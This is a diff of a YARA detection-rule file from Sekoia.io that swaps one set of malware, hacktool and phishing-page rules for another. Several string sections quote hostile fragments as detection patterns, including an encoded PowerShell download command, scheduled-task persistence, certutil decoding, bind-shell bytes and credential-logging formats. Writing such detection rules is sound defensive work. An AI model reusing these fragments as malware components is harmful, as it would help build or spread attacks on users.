-		$s1 = "main.http400"
-		$s2 = "main.fofa_c"
-		$s3 = "main.Jsjump"
-		$s4 = "main.StandBase64"
-		$s5 = "main.fofa_http"
-		$s6 = "main.fofa_seach"
+		$ = "[.] Spawning suid process (%s) ..."
+		$ = "[.] Tracing midpid ..."
+		$ = "PTRACE_TRACEME local root (CVE-2019-13272)"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 11MB and all of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Kimsuky_Fpspy : FILE
+rule SEKOIA_Keylogger_Win_Donot
 {
 	meta:
-		description = "Detects FPSpy, a backdoor used by Kimsuky"
+		description = "Detect the DoNot's keylogger malware"
 		author = "Sekoia.io"
-		id = "75d41851-a7a6-4068-8ea5-6a3e6e62a965"
-		date = "2024-09-27"
+		id = "4f67dda7-da68-4496-a8b4-a8a769ddd763"
+		date = "2023-03-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_fpspy.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "6d6c1b175e435f5564341cc1f2c33ddf"
-		hash = "54c58b72f98cb63c44e7694add551e9d"
-		logic_hash = "65904b77a30b2e2a25f8d80ab32742f0ad931f07c034ae576a4fbde7e1fd999c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/keylogger_win_donot.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "eb935f84335e934346511b4108f70df469deef6ecaaba809c144197c04a28f64"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Chrome/31.0." wide
-		$ = "%srundll32.exe %s, %s %%1" wide
-		$ = "MazeFunc" wide
-		$ = "sys.dll" wide
-		$ = "KLog" wide
+		$ = "iwrct2mTFAu0ew1nyqQgoaNtNo0+52R0XiTKbwy1W48Bn1b2YcNt0+tptyY6oGoAeLDGekM/yHcdikNGi8bLqkUQ8CIdkWeT3QiympOTfjs="
+		$ = "ZmVwZW9kbWZ2c24ucHMuZ3h4LngweXBvdWpkYm1qcXE7YnFmVXp1LmZvb3VEcA=="
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them
+		1 of them
 }
-rule SEKOIA_Apt_Tealkurma_Snappytcp_Strings : FILE
+rule SEKOIA_Rat_Win_Asbit : FILE
 {
 	meta:
-		description = "Detects TealKurma SnappyTCP shell script"
+		description = "Finds Asbit samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "6bbee6d6-f490-4550-bd61-a643f93a8788"
-		date = "2023-12-08"
+		id = "b2d60eff-3dc8-4857-a0ea-d4fcd34c40bc"
+		date = "2022-09-19"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_tealkurma_snappytcp_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b91adef3332850d952cace104fc05e1b09e6175a27ae991905defc46de608e88"
+		reference = "https://blogs.juniper.net/en-us/threat-research/asbit-an-emerging-remote-desktop-trojan"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_asbit.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "1362ebe89a4d2645eb687d92510daa355a16f05da7f5513817f8439f29722827"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230282,55 +230940,82 @@ rule SEKOIA_Apt_Tealkurma_Snappytcp_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "#!/bin/bash" ascii
-		$s2 = "2>&1>/dev/null&" ascii
-		$s3 = "PATH=$PATH:$PWD;" ascii
+		$str01 = "/build?project=libexpat&_={0}" wide
+		$str02 = "/resolve?name={0}&short=true&_={1}" wide
+		$str03 = "/c ping 127.0.0.1 & del {0} /q & del /a:H {0} /q" wide
 
 	condition:
-		$s1 at 0 and $s2 at filesize -16 and $s3 and filesize < 300
+		uint16( 0 ) == 0x5A4D and 1 of them
 }
-rule SEKOIA_Unknown_Quad7_Wildcard_Login : FILE
+rule SEKOIA_Apt_37_Chinotto : FILE
 {
 	meta:
-		description = "Detects the (x|r|a)login bind shells"
+		description = "Detects obfuscation and string of APT37 stealer"
 		author = "Sekoia.io"
-		id = "01510244-0795-4299-aa66-056a2b4682e7"
-		date = "2024-07-18"
+		id = "eff8fd11-dc7a-4011-b083-181d0cca8790"
+		date = "2023-02-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/unknown_quad7_wildcard_login.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "4d9067e7cf517158337123a30a9bd0e3"
-		hash = "43ea387b8294cc4d0baaef6d26ff7c72"
-		hash = "777d6f907da38365924a0c2a12e973c5"
-		hash = "8542a3cbe232fe78baa0882736c61926"
-		hash = "1b08725acc371f6b7d05bb72d0c2d759"
-		logic_hash = "72de6fe656313bdd4f4b092ceca7248c67b8047c224104cd569dff7af1d86135"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_37_chinotto.yar#L1-L50"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a721f102b4c9568379649f8004fa4eb460240145ab829d8ce3740dafb52d13c8"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "feab7940559392bbf38f29267509340569160e0a3b257fd86e5c65ae087ea014"
+		hash2 = "c9d2c8b6011a53e68e4a6c6e51142cef3348951d0b379e49b1a65a1891538df5"
+		hash3 = "2f5be3773e7e3a2f6806cdef154adfabc454c0e57a49e437c5889ce09b739302"
+		hash4 = "5bf170c95ca0e2079653d694f783b5bcd38f274ea875f67f0b60db4ac552a66c"
+		hash5 = "6fad04c836bc923f12ebaec8d8fb0c7091b044bf6f5c97e36d7bf46b8494f978"
+		hash6 = "64fe964f342acca6d85d247c4f67503e4222a58dfc5c644dedc2006a4b356d39"
+		hash7 = "6e216b265ea391f71f2a609df995f36b9ba8b17c8859f6d8e4ce4a076d351efd"
+		hash8 = "70dcc03cde3dd5c5ec6a6a240190cfb51667aaba9c867e20281e8dfc43afa891"
+		hash9 = "5053390bde150b771f8efe344b692c6c5718ba9203a4b23f5323af1ee9060ff2"
+		hash10 = "089e4dfd8b25afe596eff05baae86156a4e3243c84faa15416cff31a5120e107"
+		hash11 = "37e096338a78cb06d6236cb5a04cf125f191871ded3c9421f08a37890a095eb8"
+		hash12 = "b90a2b0249407b271a5d849fe82cbf4e9a31c2c6259caf515c9be3897e327414"
+		hash13 = "8f4751ed22619b04009c4b85ec45c8140b570835ca4c638c9e6019e7b7eb66c7"
 
 	strings:
-		$string1 = { 2f 62 69 6e 2f 73 68 00 2f 74 6d 70 2f 6c 6f 67 69 6e }
-		$string2 = { 2f 62 69 6e 2f 73 68 00 2d 63 00 65 78 69 74 20 30 }
+		$chunk_1 = {
+        C7 85 ?? ?? ?? ?? ?? ?? ?? 00
+        C7 85 ?? ?? ?? ?? ?? ?? ?? 00
+        33 C0
+        EB 03
+        8D 49 00
+        8B 8C 85 ?? ?? ?? ??
+        3B 8C 85 ?? ?? ?? ??
+        }
+		$chunk_2 = {
+        C7 84 24 ?? ?? ?? ?? ?? ?? 0? 00
+        C7 84 24 ?? ?? ?? ?? ?? ?? 0? 00
+        33 C0
+        EB 0D
+        8D A4 24 00 00 00 00
+        8D 9B 00 00 00 00
+        8B 8C 84 ?? ?? ?? ??
+        3B 8C 84 ?? ?? ?? ??
+        }
+		$movs_zip_dir_start = { C7 45 ?? 5A 69 70 20 C7 45 ?? 44 69 72 20 C7 45 ?? 53 74 61 72  C7 45 ?? 74 20 2D 20}
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 180KB and @string2 - @string1 < 3400
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and ( $chunk_1 or $chunk_2 ) and $movs_zip_dir_start
 }
-rule SEKOIA_Apt_Apt37_Malicious_Hta_File : FILE
+
+rule SEKOIA_Tool_Win_Blackfly_Proxy_Config : FILE
 {
 	meta:
-		description = "Detects malicious APT37 files"
+		description = "Detect Blackfly proxy configuration tool"
 		author = "Sekoia.io"
-		id = "22a98c27-8ff4-4760-b505-f8eacf4dabda"
-		date = "2023-03-06"
+		id = "c8a8be5d-bd28-4306-9466-ad582e53fede"
+		date = "2023-02-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt37_malicious_hta_file.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "85289bea86641ea9c359c361d075783449d453017485170abc87c47872792210"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_win_blackfly_proxy_config.yar#L4-L29"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a421d933209f3a81f7430f1b933074701a1fc965c1b4bc321cc7b4e89802f483"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230338,28 +231023,25 @@ rule SEKOIA_Apt_Apt37_Malicious_Hta_File : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "<HTML>" nocase
-		$s2 = " UwB0AGEAcgB0AC0AUwBs" ascii
-		$s3 = "= new ActiveXObject(" ascii
-		$s4 = "\", \"\", \"open\", 0);" ascii
-		$s5 = ".moveTo(" ascii
-		$s6 = "self.close();"
+		$ = "c:\\ProgramData\\l.dat"
+		$ = "C:\\ProgramData\\b.dat"
+		$ = "winmm_DotNetfile.dll"
 
 	condition:
-		$s1 at 0 and all of them and filesize < 1MB
+		pe.imphash( ) == "ff47f65286cc51a1328bc94efbf4007f" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f5923d4331f7e84fbbbd6fd84b6d3e6a" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "56acc10233c711a4eba9ca9aeab47e30" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "824dcebe93ac83bf5c95c781a60b3578" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ec716a08b5e647f5c00c5dfc079dfa62" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5cb63f7392c9e05c22e89cd86bd7f718" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ee04e245066e25edd3062d823f15deda" ) or ( uint16( 0 ) == 0x5A4D and 1 of them )
 }
-rule SEKOIA_Koiloader_Lnk : FILE
+rule SEKOIA_Hacktool_Defendercontrol_Strings : FILE
 {
 	meta:
-		description = "LNK file leading to deploy KoiLoader"
+		description = "Detects DefenderControl based on strings"
 		author = "Sekoia.io"
-		id = "e82975b9-94b7-4de8-8cd5-d594aa80cf02"
-		date = "2024-03-20"
+		id = "c6587a46-5f9b-4bf0-9231-9d2505293557"
+		date = "2022-03-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/koiloader_lnk.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "49953c76796f671ed80afa21872aac500d706f2af4426a5ec2854e16b9d0e474"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_defendercontrol_strings.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8372ab6f922471c28b528d908527f52d393cf6e6308d6acad882d6d5862df43c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230367,26 +231049,27 @@ rule SEKOIA_Koiloader_Lnk : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "bat & schtasks /create" wide
-		$s2 = "/sc minute /mo 1" wide
-		$s3 = "c3RhcnQgL21pbiBwb3dlcnNoZWxsIC1jb21tYW5kICJJV1IgLVVzZUJhc2ljUGFyc2luZyAnaHR0cHM6" wide
-		$s4 = " & certutil -f -decode " wide
+		$ = "www.sordum.org All Rights Reserved." wide
+		$ = "dControl.exe" wide
+		$ = "By BlueLife" wide
 
 	condition:
-		uint32( 0 ) == 0x0000004c and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 600KB and all of them
 }
-rule SEKOIA_Launcher_Win_Stealthmutant_Bat_Launcher : FILE
+rule SEKOIA_Apt_Apt28_Ukrnet_Phishing_Page : FILE
 {
 	meta:
-		description = "StealthMutant/StealthVector bat launcher"
+		description = "Detects APT28 Phishing page"
 		author = "Sekoia.io"
-		id = "7452291f-2244-469e-bb7c-5eff1ca17aa2"
-		date = "2021-08-26"
+		id = "053158d8-aac0-486f-8432-834a06f41ed2"
+		date = "2024-09-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/launcher_win_stealthmutant_bat_launcher.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "06ae4bc3ed938738dfca10c182a6a2363aa6aa70e730aefd41f6fe73c675785d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt28_ukrnet_phishing_page.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "20dc3a5beb8e3a7801e010b4113efef1"
+		hash = "5f1462144d7704101cd71c679ea0322b"
+		logic_hash = "3d077a7ce35094bcbda763c131d4564ffbcea0373f5cbd30406ada4e9db36529"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230394,29 +231077,30 @@ rule SEKOIA_Launcher_Win_Stealthmutant_Bat_Launcher : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "set \"WORK_DIR=" ascii
-		$s2 = "set \"DLL_NAME=" ascii
-		$s3 = "set \"SERVICE_NAME=" ascii
-		$s4 = "set \"DISPLAY_NAME=" ascii
-		$s5 = "set \"DESCRIPTION=" ascii
-		$start = "@echo off" ascii
-		$end = "net start \"%SERVICE_NAME%\"" ascii
+		$ = "baseurl+\"/captcha\""
+		$ = "(\"sessionID\", sessionID"
+		$ = ".responseJSON['origin"
+		$ = "var baseurl="
+		$ = "(req.responseText.includes("
+		$ = "else if (req.responseText=='FAIL')"
+		$ = "|| document.getElementById('confpwd"
+		$ = "/master/dist/text-security-disc.woff"
 
 	condition:
-		uint16( 0 ) != 0x5A4D and all of ( $s* ) and filesize < 2KB and $start at 0 and $end in ( filesize -30 .. filesize )
+		4 of them and filesize < 500KB
 }
-rule SEKOIA_Hacktool_Iox_Tunneling : FILE
+rule SEKOIA_Apt_Emberbear_Credpump_Strings : FILE
 {
 	meta:
-		description = "Detects IOX tunneling tool"
+		description = "Detects CredPump backdoor"
 		author = "Sekoia.io"
-		id = "45b31d67-95e9-405d-88ea-3f2006ef160a"
-		date = "2022-10-13"
+		id = "c9898e34-4ab8-49d6-9c8a-3fce592449e2"
+		date = "2023-02-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_iox_tunneling.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e15df032864799e282ee89402d22b82e5d4b8f469ec292575a1bcb78d24db012"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_emberbear_credpump_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6f2c96fe3f314221626b4c053658af0e7231f151886f10eb1d69e07ea3e5c634"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230424,28 +231108,26 @@ rule SEKOIA_Hacktool_Iox_Tunneling : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "iox/operate.Local2Remote"
-		$ = "iox/operate.Local2Local"
-		$ = "iox/operate.Remote2Remote"
-		$ = "iox/operate.ProxyLocal"
-		$ = "iox/operate.ProxyRemote"
-		$ = "iox/operate.ProxyRemoteL2L"
+		$ = "User=%s Pass=%s Host=%s"
+		$ = "/etc/rc0.d/.rc0.d"
+		$ = "pam_get_authtok"
+		$ = "Password:"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 5MB and all of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 200KB and all of them
 }
-rule SEKOIA_Tool_Petitpotato : FILE
+rule SEKOIA_Apt_Micdown_Encrypted_Configuration : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Encrypted C2 configuration of micDown"
 		author = "Sekoia.io"
-		id = "72808202-a124-478e-bc60-59d35824b948"
-		date = "2023-08-23"
+		id = "9567d68b-05d1-4d41-b87f-c8691ee689cd"
+		date = "2023-08-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_petitpotato.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "93a46c7765ad9f18c2176b98c91edf97827707ffdefcedc40078c87c30343508"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_micdown_encrypted_configuration.yar#L1-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9b80bd284f9aa9e4073bdead7bb0c5412ec1809c36a85dfd35d9ea7ac62da8a3"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230453,50 +231135,49 @@ rule SEKOIA_Tool_Petitpotato : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s2 = "set_FileName" ascii wide
-		$s3 = "VarFileInfo" ascii wide
-		$s4 = "PetitPotato.exe" ascii wide
-		$s5 = "0.0.0.0" ascii wide
+		$s1 = {?? [20] 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 84 36}
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them
+		filesize == 66 and all of them
 }
-
-rule SEKOIA_Downloader_Win_Andarloader : FILE
+rule SEKOIA_Win_Malware_Janelarat_Strings : FILE
 {
 	meta:
-		description = "Detect the AndarLoader downloader used by Andariel"
+		description = "Detect the JanelaRAT malware"
 		author = "Sekoia.io"
-		id = "96dd737e-601c-4370-9fa6-4bbafafae203"
-		date = "2023-09-04"
+		id = "891f182e-8a7a-4d0c-a481-62c198bb901b"
+		date = "2023-08-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_win_andarloader.yar#L4-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "33e5490b9564333c27a2c23d7f0362c582ca3bd352cafde6b334dc376fd37762"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/win_malware_janelarat_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "00df0a1f037e24ff1528d524fb7398735e2c3e0a9995a9f95a5293b04748f06e"
+		logic_hash = "cf2ca92cf790211f69ea9645f1c1b865d5503d14a1dcce535b4a69c735ea3dad"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "02135f60f3edff0b9baa4c20715ee6a80c94f282079bf879265f5e020d37cf88"
-		hash2 = "54ed7a7430974cc2ea694f49f3e637b835dcd24aa19d66af854ad47b87068c92"
+
+	strings:
+		$s2 = {4d 58 4e 4f 42 55 47 4d 41 47}
+		$s1 = "block.blq" wide
 
 	condition:
-		for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "b338ad077c7f5be85c33def7287198841d55af8cd1ad856fdcd16fdc78f18838" ) and filesize < 100KB
+		( uint16be( 0 ) == 0x4d5a ) and filesize > 100KB and filesize < 1MB and 2 of them
 }
-rule SEKOIA_Clwiper_Strings : FILE
+rule SEKOIA_Apt_Luckymouse_Rshell_Strings : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects LuckyMouse RShell Mach-O implant"
 		author = "Sekoia.io"
-		id = "91e531e2-8548-460f-88a8-cc09abb901e0"
-		date = "2022-09-15"
+		id = "89f18013-ea3e-440f-821e-cef102a43b7b"
+		date = "2022-08-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/clwiper_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b6bcd7e20b07ab8a9a54672f60a8ffe6d6bf787630f01b9dcefd1cbc78297050"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_luckymouse_rshell_strings.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ffca47856d4c4d83312220cff23c0a556be0e675d59ac009c2f74fc0e39cb816"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230504,28 +231185,32 @@ rule SEKOIA_Clwiper_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$w1 = "missing args"
-		$w2 = "wp starts"
-		$w3 = "Total Bytez : %lld"
-		$w4 = "percent is %f spent time is %.2fs"
-		$d1 = "\\\\?\\RawDisk3"
-		$d2 = "B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D"
+		$ = { 64 69 72 00 70 61 74 68
+        00 64 6F 77 6E 00 72 65
+        61 64 00 75 70 6C 6F 61
+        64 00 77 72 69 74 65 00
+        64 65 6C }
+		$ = { 6C 6F 67 69 6E 00 68 6F
+        73 74 6E 61 6D 65 00 6C
+        61 6E 00 75 73 65 72 6E
+        61 6D 65 00 76 65 72 73
+        69 6F 6E }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and ( 3 of ( $w* ) or all of ( $d* ) )
+		( uint32be( 0 ) == 0xCFFAEDFE or uint16be( 0 ) == 0x4d5a ) and filesize < 300KB and all of them
 }
-rule SEKOIA_Hacktool_Rubeus_Strings : FILE
+rule SEKOIA_Apt_Sidecopy_Malicious_Macro : FILE
 {
 	meta:
-		description = "Detects Rubeus based on strings"
+		description = "Detects malicious macro used by SideCopy"
 		author = "Sekoia.io"
-		id = "048cab99-c288-44c2-9dc6-74eed02ef8f5"
-		date = "2022-02-15"
+		id = "4b90c33e-48d4-48b6-87a7-c35686e7e913"
+		date = "2023-05-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_rubeus_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "606c1b3c29dd4b609eba64bc5d02a81859bb574ee10bce8b0f355ac01d99689f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_sidecopy_malicious_macro.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b1d9d7af8507b478b2a8d34a4a5ca3714b219a42d5b3f9d5026d98351294e1cf"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230533,82 +231218,104 @@ rule SEKOIA_Hacktool_Rubeus_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "includeComputerAccounts" ascii
-		$ = "passwordsOutfile" ascii
-		$ = "monitorIntervalSeconds" ascii
-		$ = "displayNewTickets" ascii
-		$ = "658c8b7f-3664-4a95-9572-a3e5871dfc06" ascii
+		$ = "htmlFile$"
+		$ = "Gecko/20100101 Firefox/91.0"
+		$ = "Start Menu\\Programs\\Startup\\"
+		$ = "Document_Close"
+		$ = "ThisDocument" wide
+		$ = "ServerXMLHTTP.6.0"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
+		uint32be( 0 ) == 0xD0CF11E0 and all of them
 }
-rule SEKOIA_Tool_Printnotifypotato : FILE
+rule SEKOIA_Infostealer_Mac_Realst : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Finds Realst Stealer samples based on specific strings"
 		author = "Sekoia.io"
-		id = "8dde175f-025a-4c27-bcc6-d0016dd7238c"
-		date = "2023-08-23"
+		id = "16a89317-c92d-4e13-94d3-a85a915f52e5"
+		date = "2023-09-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_printnotifypotato.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5d4b7d1582c2b3f53ca5e1ff6e7ff97a677fe8870e94415f7328ea0a0387049c"
+		reference = "https://iamdeadlyz.gitbook.io/malware-research/july-2023/fake-blockchain-games-deliver-redline-stealer-and-realst-stealer-a-new-macos-infostealer-malware#realst-stealer-macos"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_mac_realst.yar#L1-L32"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "72e694e5c32cbaeb7dff7913fde671619e2c8d892e552546dd1682e38f6804c5"
 		score = 75
-		quality = 80
+		quality = 30
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "PrintNotifyPotato.exe" ascii wide
-		$s2 = "BeichenDream" ascii wide
-		$s3 = "interactive" ascii wide
-		$s4 = "DuplicateTokenEx" ascii wide
-		$s5 = "CurrentUser" ascii wide
-		$s6 = "FakeIUnknown" ascii wide
+		$str00 = "realst@" ascii
+		$str01 = "IP:" ascii
+		$str02 = "OS:" ascii
+		$str03 = "PC PASSWORD:" ascii
+		$str04 = "Cookies:" ascii
+		$str05 = "Wallets:" ascii
+		$str06 = "Apps:" ascii
+		$str07 = "USERNAME: ]" ascii
